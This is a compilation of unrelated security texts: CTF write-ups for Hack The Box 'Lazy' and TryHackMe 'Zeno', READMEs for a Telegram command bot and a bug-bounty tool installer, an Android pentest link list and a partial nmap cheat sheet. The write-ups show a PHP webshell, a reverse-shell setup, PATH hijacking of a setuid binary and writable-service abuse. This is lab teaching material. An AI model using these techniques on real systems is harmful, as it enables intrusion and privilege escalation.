--2017-10-15 11:36:53-- http://10.10.10.18/mysshkeywithnamemitsos
Connecting to 10.10.10.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1679 (1.6K)
Saving to: ‘mysshkeywithnamemitsos’
mysshkeywithnamemitsos 100%[===========================================================================================>] 1.64K --.-KB/s in 0s
2017-10-15 11:36:53 (75.3 MB/s) - ‘mysshkeywithnamemitsos’ saved [1679/1679]
root@kali:~/Hackthebox/Machines/Lazy# mv mysshkeywithnamemitsos mitsos.key
root@kali:~/Hackthebox/Machines/Lazy# chmod 600 mitsos.key
```
And we connect to mitsos
```
root@kali:~/Hackthebox/Machines/Lazy# ssh -i mitsos.key mitsos@10.10.10.18
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Oct 15 11:29:36 EEST 2017
System load: 0.0 Processes: 178
Usage of /: 7.6% of 18.58GB Users logged in: 0
Memory usage: 12% IP address for eth0: 10.10.10.18
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Sun Oct 15 11:29:36 2017 from 10.10.15.189
mitsos@LazyClown:~$
```
**user.txt**
```
mitsos@LazyClown:~$ cat user.txt
d558e7924bdfe31266ec96b007dc63fc
```
**Priv Esc**
```
mitsos@LazyClown:~$ ls -l
total 20
-rwsrwsr-x 1 root root 7303 May 3 00:02 backup
drwxrwxr-x 4 mitsos mitsos 4096 May 2 18:41 peda
-rw------- 1 root root 33 Oct 15 04:54 tmp.txt
-rw------- 1 mitsos mitsos 33 May 3 18:52 user.txt
```
There is a executable named backup
When we try and run it, it gives something like this
```
mitsos@LazyClown:~$ ./backup
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4OsDPuL0:17288:0:99999:7:::
daemon:*:17016:0:99999:7:::
bin:*:17016:0:99999:7:::
sys:*:17016:0:99999:7:::
sync:*:17016:0:99999:7:::
games:*:17016:0:99999:7:::
man:*:17016:0:99999:7:::
lp:*:17016:0:99999:7:::
mail:*:17016:0:99999:7:::
news:*:17016:0:99999:7:::
uucp:*:17016:0:99999:7:::
proxy:*:17016:0:99999:7:::
www-data:*:17016:0:99999:7:::
backup:*:17016:0:99999:7:::
list:*:17016:0:99999:7:::
irc:*:17016:0:99999:7:::
gnats:*:17016:0:99999:7:::
nobody:*:17016:0:99999:7:::
libuuid:!:17016:0:99999:7:::
syslog:*:17016:0:99999:7:::
messagebus:*:17288:0:99999:7:::
landscape:*:17288:0:99999:7:::
mitsos:$6$LMSqqYD8$pqz8f/.wmOw3XwiLdqDuntwSrWy4P1hMYwc2MfZ70yA67pkjTaJgzbYaSgPlfnyCLLDDTDSoHJB99q2ky7lEB1:17288:0:99999:7:::
mysql:!:17288:0:99999:7:::
sshd:*:17288:0:99999:7:::
```
Lets run a strings on it
```
mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
...
...
...
```
So its a simple exec which runs the command "cat /etc/shadow" and it is run by root
This is perfect for priv esc!
Our path contains
```
mitsos@LazyClown:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```
What we can do is create a executable with the name cat in our home directory and add the our home directory to our $PATH
Lets start by addint the $PATH first
```
mitsos@LazyClown:~$ export PATH="/home/mitsos:$PATH"
mitsos@LazyClown:~$ echo $PATH
/home/mitsos:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
```
Now we need to create a cat executable.
We can create a bash script which will spawn a bash shell
Something as simple as
```
#!/bin/sh
/bin/sh
```
```
mitsos@LazyClown:~$ vim cat
mitsos@LazyClown:~$ chmod 777 cat
mitsos@LazyClown:~$ ls -l
total 24
-rwsrwsr-x 1 root root 7303 May 3 00:02 backup
-rwxrwxrwx 1 mitsos mitsos 19 Oct 15 23:00 cat
drwxrwxr-x 4 mitsos mitsos 4096 May 2 18:41 peda
-rw------- 1 root root 33 Oct 15 04:54 tmp.txt
-rw------- 1 mitsos mitsos 33 May 3 18:52 user.txt
```
We run "backup" now and it should pawn this lazy banana
```
mitsos@LazyClown:~$ ./backup
# id
uid=1000(mitsos) gid=1000(mitsos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(mitsos)
```
Remember, the cat command wont work now. So to use it we have to call it directly from /bin/cat
**root.txt**
```
/binn/cat /root/root.txt
990b142c3cefd46a5e7d61f678d45515
```
|
# Bot Bounty
![](https://visitor-badge.glitch.me/badge?page_id=draykoGithub.visitor-badge&left_text=Times%20repository%20visited&right_color=orange&left_color=blue)
Python Script for Telegram Bot is specially builded for pentest & bug bounty. It's like a telegram shell.
You will be notified when your task(command line) is finished with results. This bot make long time tasks by you, taking off the need of your attention if it's finished.
## Preview 👀
|![/start command](./previews/start.jpg)|![/help command](./previews/help.jpg)|
|---------------------------------------|---------------------------------------|
|![/nmapadv command](./previews/customNmap.jpg)|![/amassenum command](./previews/amassEnum.jpg)|
## Getting Started
* Developed with Python 3.8.5
### 🔨 Prerequisites
You need to install the Python Telegram bot api used for this bot(pyTelegramBotAPI).
```shell
$ pip3 install pyTelegramBotAPI
```
### 🥾 Steps to run your bot 🥾
Create a bot with [@botfather](https://t.me/botfather) and replace the API Token gaven by @botfather in the script `config.py` at line 2:
```python
TOKEN = 'XXXXXX:XXXXXXXXXXXXXXXX'
```
At same file(`config.py`) add the ID number(s) of the user(s) who is/are authorized at line 4:
```python
authorizedUsers = [123456789, 987654321]
```
to know which is your User ID go to [@userinfobot](https://t.me/userinfobot)
Now just run the script:
```shell
$ python3 bot.py
```
## Tip
**If your output is too large, you should save it in a file with no output.**
E.g.:
- ```\nmapadv example.com > resultScan.txt```
- ```\nmapadv example.com -oN resultScan.txt```
- ```\exec echo 'awesome bot!' > yesItIs.txt```
## Available commands
```bash
├── /start # starts/reset the bot
│ └── Main Menu # keyboard personalized options
│ ├── info serv
│ │ ├── Temp # temperature of your device
│ │ ├── Hard Disk Space
│ │ ├── RAM # info of your RAM
│ │ └── CPU # Usage of your CPU
│ ├── ip route
│ ├── public ip
│ ├── active processes
│ ├── netstat # by services
│ └── who # who is logged on your device
├── /exec # execute a command line that you give E.g.:
│ # /exec echo 'awesome bot!')
├── /amassenum # /amassenum example.com -> $ amass enum -d example.com
├── /nmapadv # /nmapadv example.com -> $ nmap -sC -sV -Pn -p-
└── /help # show list of commands avaibles
```
## 🎥 Security Logger
There is a `logFileBot.txt` file where will log all commands sended by user(s). In addition, if it's the case someone trying to use your bot without your authorization.
## Author
* Drayko Esobar - If you like my work, please...<a href="https://www.buymeacoffee.com/drayko" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 41px !important;width: 174px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
## Contributors 🤘🏼
* no one until now... You can be here! :D Open to **new commands**, suggests, changes or improvements.
## License
This project is licensed under the GNU General Public License v3.0
## Acknowledgments
* To [Va5c0](https://github.com/Va5c0/), for his previus work.
|
# VPS-Bug-Bounty-Tools
Script that automates the installation of the main tools used for web application penetration testing and Bug Bounty.
## Usage:
```bash
cd /tmp && git clone https://github.com/drak3hft7/VPS-Bug-Bounty-Tools
cd VPS-Bug-Bounty-Tools
sudo ./Tools-BugBounty-installer.sh
```
## Example during installation:
![Main Logo](images/tool.PNG 'Example')
# List of tools inserted:
## Network scanner:
- [Nmap](https://nmap.org/)
- [Masscan](https://github.com/robertdavidgraham/masscan)
- [Naabu](https://github.com/projectdiscovery/naabu)
## Subdomain Enumeration and DNS Resolver:
- [Massdns](https://github.com/blechschmidt/massdns)
- [Subfinder](https://github.com/projectdiscovery/subfinder/)
- [Knock](https://github.com/guelfoweb/knock.git)
- [Lazyrecon](https://github.com/nahamsec/lazyrecon.git)
- [Github-subdomains](https://github.com/gwen001/github-subdomains)
- [Sublist3r](https://github.com/aboul3la/Sublist3r.git)
- [Crtndstry](https://github.com/nahamsec/crtndstry.git)
- [Assetfinder](https://github.com/tomnomnom/assetfinder)
- [Dnsx](https://github.com/projectdiscovery/dnsx)
- [Dnsgen](https://github.com/ProjectAnte/dnsgen)
## Subdomain Takeovers:
- [SubOver](https://github.com/Ice3man543/SubOver)
## Web Fuzzer:
- [Dirsearch](https://github.com/maurosoria/dirsearch)
- [Ffuf](https://github.com/ffuf/ffuf)
## Wordlists:
- [SecLists](https://github.com/danielmiessler/SecLists.git)
## Scanner CMS:
- [Wpscan](https://github.com/wpscanteam/wpscan)
- [Droopescan](https://github.com/droope/droopescan)
## Vuln SQL:
- [SQLmap](https://sqlmap.org/)
- [NoSQLmap](https://github.com/codingo/NoSQLMap.git)
- [Jeeves](https://github.com/ferreiraklet/Jeeves)
## Enumeration Javascript:
- [LinkFinder](https://github.com/GerbenJavado/LinkFinder.git)
- [SecretFinder](https://github.com/m4ll0k/SecretFinder.git)
- [JSParser](https://github.com/nahamsec/JSParser.git)
## Visual Recon:
- [Aquatone](https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip)
## Crawling Web:
- [GoSpider](https://github.com/jaeles-project/gospider)
- [Hakrawler](https://github.com/hakluke/hakrawler)
- [Katana](https://github.com/projectdiscovery/katana)
## Vuln XSS:
- [XSStrike](https://github.com/s0md3v/XSStrike)
- [XSS-Loader](https://github.com/capture0x/XSS-LOADER/)
- [Freq](https://github.com/takshal/freq)
- [Gxss](https://github.com/KathanP19/Gxss)
- [Dalfox](https://github.com/hahwul/dalfox)
## Vuln SSRF:
- [SSRFmap](https://github.com/swisskyrepo/SSRFmap)
- [Gopherus](https://github.com/tarunkant/Gopherus.git)
## Vulnerability Scanner:
- [Nuclei](https://github.com/projectdiscovery/nuclei)
## Virtual Host Discovery:
- [Virtual host scanner](https://github.com/jobertabma/virtual-host-discovery.git)
## Useful Tools:
- [Anew](https://github.com/tomnomnom/anew)
- [Unew](https://github.com/dwisiswant0/unew)
- [Gf](https://github.com/tomnomnom/gf)
- [Httprobe](https://github.com/tomnomnom/httprobe)
- [Httpx](https://github.com/projectdiscovery/httpx/)
- [Waybackurls](https://github.com/tomnomnom/waybackurls)
- [Arjun](https://github.com/s0md3v/Arjun)
- [Gau](https://github.com/lc/gau)
- [Uro](https://github.com/s0md3v/uro)
- [Qsreplace](https://github.com/tomnomnom/qsreplace)
- [SocialHunter](https://github.com/utkusen/socialhunter)
# Update - Time Line:
- 28 September 2021: Inserted into the script the XSS-Loader tool.
- 10 November 2021: Inserted into the script the waybackurls tool.
- 22 November 2021: Inserted into the script the gau tool.
- 03 February 2022: Inserted into the script the unew,gf and SubOver tools.
- 19 March 2022: Inserted into the script the freq,qsreplace and uro tools.
- 10 April 2022: Inserted into the script the hakrawler and Jeeves.
- 20 April 2022: Inserted into the script the naabu tool.
- 15 November 2022: Inserted into the script the katana tool.
- 26 November 2022: Inserted into the script the Gxss and Dalfox tools
- 19 January 2023: Inserted into the script the socialhunter tool.
|
# Zeno
Writeup for [Zeno](https://tryhackme.com/room/zeno) room at [TryHackMe](https://tryhackme.com/).
URL for this room is: https://tryhackme.com/room/zeno
Table of Contents
=================
* [Port Scan](#Port-scan)
* [Enumerating the Webserver](#Enumerating-the-Webserver)
* [Remote Code Execution](#Remote-Code-Execution)
* [Gaining Access](#Gaining-Access)
* [Root Access](#Root-Access)
# Port scan
Firstly, I have set an environment variable `IP` of the target machine's IP address.
Then I have conducted ***Nmap SYN*** scan against all of the TCP ports of the target machine with the command `sudo nmap -vv -sS -p- $IP` to see which ports are open. I had saved the following output to a file with `-oN` flag:
```
# Nmap 7.60 scan initiated Sat Oct 23 10:27:21 2021 as: nmap -vv -sS -p- -oN enum.txt 10.10.154.116
Nmap scan report for ip-10-10-154-116.eu-west-1.compute.internal (10.10.154.116)
Host is up, received arp-response (0.00042s latency).
Scanned at 2021-10-23 10:27:21 BST for 155s
Not shown: 65533 filtered ports
Reason: 65372 no-responses and 161 host-prohibiteds
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
12340/tcp open unknown syn-ack ttl 64
MAC Address: 02:F5:20:98:22:CD (Unknown)
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Oct 23 10:29:57 2021 -- 1 IP address (1 host up) scanned in 155.84 seconds
```
The open ports are:
1. Port ***22*** running SSH service.
2. Port ***12340*** with an unknown service running.
Against those ports I have performed a more comprehensive scan with the command `nmap -vv -O -sV -sC -p 22,12340 $IP`. I was able to get the following information:
```
#Nmap 7.60 scan initiated Sat Oct 23 10:38:03 2021 as: nmap -vv -O -sV -sC -p 22,12340 -oN open_ports.txt 10.10.94.20
Nmap scan report for ip-10-10-154-116.eu-west-1.compute.internal (10.10.154.116)
Host is up, received arp-response (0.00043s latency).
Scanned at 2021-10-23 10:38:03 BST for 17s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDakZyfnq0JzwuM1SD3YZ4zyizbtc9AOvhk2qCaTwJHEKyyqIjBaElNv4LpSdtV7y/C6vwUfPS34IO/mAmNtAFquBDjIuoKdw9TjjPrVBVjzFxD/9tDSe+cu6ELPHMyWOQFAYtg1CV1TQlm3p6WIID2IfYBffpfSz54wRhkTJd/+9wgYdOwfe+VRuzV8EgKq4D2cbUTjYjl0dv2f2Th8WtiRksEeaqI1fvPvk6RwyiLdV5mSD/h8HCTZgYVvrjPShW9XPE/wws82/wmVFtOPfY7WAMhtx5kiPB11H+tZSAV/xpEjXQQ9V3Pi6o4vZdUvYSbNuiN4HI4gAWnp/uqPsoR
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEMyTtxVAKcLy5u87ws+h8WY+GHWg8IZI4c11KX7bOSt85IgCxox7YzOCZbUA56QOlryozIFyhzcwOeCKWtzEsA=
| 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOKY0jLSRkYg0+fTDrwGOaGW442T5k1qBt7l8iAkcuCk
12340/tcp open http syn-ack ttl 64 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
| Supported Methods: OPTIONS GET HEAD POST TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: We've got some trouble | 404 - Resource not found
MAC Address: 02:F5:20:98:22:CD (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.13 (93%), Linux 3.8 (93%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.60%E=4%D=10/23%OT=22%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=02F520%TM=6173D80C%P=x86_64-pc-linux-gnu)
SEQ(SP=101%GCD=1%ISR=10B%TI=Z%TS=A)
OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)
ECN(R=Y%DF=Y%TG=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 0.030 days (since Sat Oct 23 09:55:45 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 23 10:38:20 2021 -- 1 IP address (1 host up) scanned in 16.85 seconds
```
On port ***22*** an `OpenSSH 7.4` ssh service is running.
On port ***12340*** an `Apache httpd 2.4.6 (CentOS)` webeserver is running. This webserver also has `PHP/5.4.16` installed.
# Enumerating the Webserver
Connecting to the webserver from within a browser gives ***Resource not found*** error shown below.
![Resource not found](/Zeno/images/Resource_not_found.png)
I have then used `nikto -h $IP -p 12340` command to enumerate the webserver's directories. The output of this command was:
```
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 10.10.154.16
+ Target Hostname: ip-10-10-154-16.eu-west-1.compute.internal
+ Target Port: 12340
+ Start Time: 2021-10-23 11:05:36 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS) PHP/5.4.16
+ Server leaks inodes via ETags, header found with file /, fields: 0xf39 0x5c80c1adc76e0
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2021-10-23 11:05:46 (GMT1) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested``
```
For further enumeration of the webserver's directories I have used `gobuster dir -u http://$IP:12340 -w /usr/share/wordlists/dirb/big.txt` command, which resulted in the following:
```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.154.116:12340/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/10/23 14:20:25 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/rms (Status: 301)
===============================================================
2021/10/23 14:20:28 Finished
===============================================================
```
The scan lists three possible directories, from which only `/rms` one is accessible. Going to this webserver's directory via a browser gives a homepage of Pathfinder Hotel Restaurant Management System.
![Restaurant management system](/Zeno/images/Restaurant_management_system.png)
The Google search of `restaurant management system exploit` led to a Remote Code Execution exploit for this system, written in Python.
# Remote Code Execution
The downloaded exploit had formatting issues and a broken hardcoded proxy.
Fixing formatting and deleting code for proxy led to a successful upload of a webshell `<?php echo shell_exec($_GET["cmd"]); ?>` at http://$IP:12340/rms/images/reverse-shell.php URL, which shows blank page.
![Blank exploit page](/Zeno/images/Blank_exploit_page.png)
Although the uploaded webshell can accept commands with the syntax of http://$IP:12340/rms/images/reverse-shell.php?cmd=<argument>. For example, id argument prints this:
![System ID](/Zeno/images/System_ID.png)
At this point I am doing the following:
1. Exporting 1234 as a listening port - LPORT - and setting up a netcat listener with `nc -lnvp $LPORT`.
2. Passing a Python reverse shell found at [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) as an argument to the webshell URL.
The webpage is blank, but the listener captured a shell connection!
![Reverse shell](/Zeno/images/Reverse_shell.png)
# Gaining Access
Going to the server's home directory shows that the user `edward` is on the system.
Tried Hydra for cracking edward's SSH password but no luck there.
Getting back to /var/www/html/rms/connection folder and listing it's contets shows a config.php file. Inside this file there are credentials for the root user of a database.
![Database credentials](/Zeno/images/Database_credentials.png)
Although connecting to mysql database from the shell with these credentials resulted in an error.
***Update 10/29/2021***
I tried downloading LinPeas to the remote machine with curl, but it failed.
Then I looked up in /etc/fstab file and found credentials for user `edward` on zeno machine.
Connected to the remote machine with zeno password with user `edward` via SSH and found the user.txt file with the first flag.
# Root Access
There is a writable service file named zeno-monitoring.
Adding `ExecStart=/usr/bin/cp /root/root.txt /home/edward/rootflag.txt` command to the zeno-monitoring service file and rebooting the machine leads to having a readable rootflag.txt file with ***root flag*** in edward's home directory after a reconnection to a rebooted machine.
|
# Android Pentest 101 ![awesome](https://awesome.re/badge.svg)
<!-- Maintained by [@Anubhav Singh](https://twitter.com/AnubhavSingh_) with contributions from the security communities.
-->
<!-- ## Introduction -->
<img src="/img/Android_Logo.jpeg" width="700" height="500">
### A curated list of Android Security materials and resources For Pentesters and Bug Hunters. This Repository will guide you on How to start with Android pentesting from scratch, enjoy it!!
---
<!-- ![Image](/img/Android_Logo.jpeg) -->
<!-- <img src="/img/Android_Logo.jpeg" width="700" height="500"> -->
## Basics
1. Android Application Framework: Beginner’s Guide : <br> https://www.hackingarticles.in/android-application-framework-beginners-guide/
2. How Android OS Starts You Application : <br> https://proandroiddev.com/android-internals-101-how-android-os-starts-you-application-e1c98a014c05
3. The internals of Android APK build process : <br> https://medium.com/androiddevnotes/the-internals-of-android-apk-build-process-article-5b68c385fb20
4. Android Architecture : <br> https://payatu.com/blog/amit/Need-to-know-Android
5. Java for Android : <br> https://www.youtube.com/watch?v=fis26HvvDII
6. Environment setup for Android Pentesting: <br>
1. Use Mobexler for tools : <br> https://mobexler.com/setup.htm
2. Emulator and Burpsuite Setup:
* Genymotion: <br> https://www.arridae.com/blogs/setting-up-an-android-pt-environment.php
* Nox Player: <br> https://medium.com/swlh/android-mobile-penetration-testing-lab-dfb8ceb4efbd
7. Understand Owasp Top 10:
* Using DIVA
* Simple level : <br> https://danishzia.medium.com/diva-android-app-walkthrough-bce72b7f273a
* Code level : <br> https://reversingbinaries.in/diva-apk-analysis/
* Aditya Agarwal Writeups (Go through all) <br> https://manifestsecurity.com/android-application-security/
8. Understand the working of tools:
* apktool : <br> https://medium.com/@jasjot784/how-to-extract-source-code-of-an-apk-using-apktool-b5f601383ab
* Dex2Jar : <br> https://github.com/pxb1988/dex2jar
* JD-GUI : <br> https://nikhil-gandla777.medium.com/how-to-decompile-the-android-apk-file-to-a-jar-file-using-dex2jar-and-jd-gui-in-your-windows-47ea1ce3c410
* MobSf : <br> https://www.hackingarticles.in/android-pentest-automated-analysis-using-mobsf/
9. APK Reversing
* Apk Reverse Engineering : <br> https://www.hackingarticles.in/android-penetration-testing-apk-reverse-engineering/
* APK Reversing (Part 2) : <br> https://www.hackingarticles.in/android-penetration-testing-apk-reversing-part-2/
* Solve InjuredAndroid CTF : <br> https://github.com/B3nac/InjuredAndroid
10. Exploiting Insecure Firebase Database! : <br> https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty/
11. Dumping Android application memory with fridump : <br> https://securitygrind.com/dumping-android-application-memory-with-fridump/
12. Android App Security & Testing : <br> https://infosecwriteups.com/android-app-security-testing-156a052ce7e8
## Intermediate
1) Understand SSL Pinning Implementation and it's bypass : <br> https://redhuntlabs.com/ultimate-guide-to-android-ssl-pinning-bypass
2) Understand Root Detection Implementation and it's bypass :
* Using frida: <br> https://redfoxsec.com/blog/android-root-detection-bypass-using-frida/
* Using Reverse engineering APK : <br> https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/
* Using Xposed : <br> https://medium.com/@cintainfinita/android-how-to-bypass-root-check-and-certificate-pinning-36f74842d3be
* Using Magisk: <br> https://techviral.net/bypass-apps-root-detection-android/
* Comparison of Different Android Root-Detection Bypass Tools: <br> https://medium.com/secarmalabs/comparison-of-different-android-root-detection-bypass-tools-8fd477251640
3) Intent Redirection, Intent spoofing and intent interception
* Penetrate the Protected Component in Android Part -1 : <br> https://payatu.com/blog/amit/Penetrate_the_protected_component_in_android_Part-0
* Penetrate the Protected Component in Android Part -2 : <br> https://payatu.com/blog/amit/Penetrate_the_protected_component_in_android_Part-2
4) WebView Attacks : <br> https://www.hackingarticles.in/android-penetration-testing-webview-attacks/
5) Drozer : <br> https://www.hackingarticles.in/android-penetration-testing-drozer/
6) Android App Reverse Engineering 101 : <br> https://www.ragingrock.com/AndroidAppRE/
7) Frida :
* Workshop on Frida : <br> https://www.youtube.com/watch?v=Bwf3eyU-hi4
* Sharpening your FRIDA scripting skills with Frida Tool : <br> https://blog.securelayer7.net/sharpening-your-frida-scripting-skills-with-frida-tool/
* Andromeda- GUI based Dynamic Instrumentation Toolkit powered by Frida : <br> https://www.youtube.com/watch?v=qOEaA2CNNmUhttps://blog.securelayer7.net/sharpening-your-frida-scripting-skills-with-frida-tool/
* Configuring Frida with BurpSuite and Genymotion to bypass Android SSL Pinning : <br> https://arben.sh/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/
* Frida's Gadget Injection on Android: No Root, 2 Methods <br> https://fadeevab.com/frida-gadget-injection-on-android-no-root-2-methods/
* Exploration of Native Modules on Android with Frida : <br> https://payatu.com/blog/amit/explore_android_native_modules_using_frida
7) Exploiting Android Fingerprint Authentication : <br> https://medium.com/@ashishf6/exploiting-android-fingerprint-authentication-25dd9263bd74
8) Bypass of Biometrics & Password Security Functionality For android : <br> https://infosecwriteups.com/bypass-of-biometrics-password-security-functionality-for-android-8e0174ac7cac
9) Android Hooking and SSLPinning using Objection Framework : <br> https://www.hackingarticles.in/android-hooking-and-sslpinning-using-objection-framework/
10) Android Security Tools : <br> https://reconshell.com/android-security-resources/
## Mind Map
* https://www.xmind.net/m/GkgaYH/
* https://www.xmind.net/m/DVAq9V/
* https://www.mindmeister.com/1491593727?t=Sfx1JsQwYW
## Advance
Go deeper in what you have learned till now ... There are lot's of material avaialble on internet to learn from. I will mention some of them which will help you to move further.
* Mobile Application Penetration Testing Cheat Sheet : <br> https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet
* Awesome-Android-Security : <br> https://github.com/saeidshirazi/awesome-android-security
* AllThingsAndroid : <br> https://github.com/jdonsec/AllThingsAndroid
* awesome-mobile-security : <br> https://github.com/vaib25vicky/awesome-mobile-security
* Android-Pentesting : <br> https://github.com/pollonegro/Android-Pentesting
## Contributions
Your contributions are always welcome!
If you want to contribute to this list (please do), send me a pull request or contact me [@AnubhavSingh_](https://twitter.com/AnubhavSingh_)
## Support
* Love it? Buy me a Tea when you meet me outside (preferred) 🥤 or via <br> <a href="https://www.buymeacoffee.com/anubhavsingh" target="_blank"><img src="https://img.buymeacoffee.com/button-api/?text=Buy%20me%20a%20Chai&emoji=%E2%98%95&slug=anubhavsingh&button_colour=FFDD00&font_colour=000000&font_family=Cookie&outline_colour=000000&coffee_colour=ffffff" alt="Buy Me A Chai"></a>
|
Nmap Cheat Sheet
================
_src: [https://www.stationx.net/nmap-cheat-sheet](https://www.stationx.net/nmap-cheat-sheet)_
Target Specification
---------------------------------------------------
| Switch | Example | Description |
|--------|---------|-------------|
| |nmap 192.168.1.1| Scan a single IP |
| | nmap 192.168.1.1 192.168.2.1 | Scan specific IPs |
| | nmap 192.168.1.1-254 | Scan a range
| | nmap scanme.nmap.org | Scan a domain |
| | nmap 192.168.1.0/24 | Scan using CIDR notation
| -iL | nmap -iL targets.txt | Scan targets from a file |
| -iR | nmap -iR 100 | Scan 100 random hosts
| --exclude | nmap --exclude 192.168.1.1 | Exclude listed hosts
Scan Techniques
---------------
| Switch | Example | Description |
|----|-----|----|
| -sS | nmap 192.168.1.1 -sS | TCP SYN port scan (Default)
| -sT | nmap 192.168.1.1 -sT | TCP connect port scan<br />(Default without root privilege)|
| -sU | nmap 192.168.1.1 -sU | UDP port scan
| -sA | nmap 192.168.1.1 -sA | TCP ACK port scan |
| -sW | nmap 192.168.1.1 -sW | TCP Window port scan
| -sM | nmap 192.168.1.1 -sM | TCP Maimon port scan
Host Discovery
--------------
| Switch | Example | Description |
|----|-----|----|
| -sL | nmap 192.168.1.1-3 -sL | No Scan. List targets only
| -sn | nmap 192.168.1.1/24 -sn | Disable port scanning. Host discovery only.<br /> |
| -Pn | nmap 192.168.1.1-5 -Pn | Disable host discovery. Port scan only. <br />| -PS | nmap 192.168.1.1-5 -PS22-25,80 | TCP SYN discovery on port x. Port 80 by default|
| -PA | nmap 192.168.1.1-5 -PA22-25,80 | TCP ACK discovery on port x.
Port 80 by default|
| -PU | nmap 192.168.1.1-5 -PU53 | UDP discovery on port x. Port 40125 by default|
| -PR | nmap 192.168.1.1-1/24 -PR | ARP discovery on local network
| -n | nmap 192.168.1.1 -n | Never do DNS resolution
Port Specification
------------------
| Switch | Example | Description |
|----|-----|----|
| -p | nmap 192.168.1.1 -p 21 | Port scan for port x
| -p | nmap 192.168.1.1 -p 21-100 | Port range |
| -p | nmap 192.168.1.1 -p U:53,T:21-25,80 | Port scan multiple TCP and UDP ports
| -p- | nmap 192.168.1.1 -p- | Port scan all ports |
| -p | nmap 192.168.1.1 -p http,https | Port scan from service name
| -F | nmap 192.168.1.1 -F | Fast port scan (100 ports) |
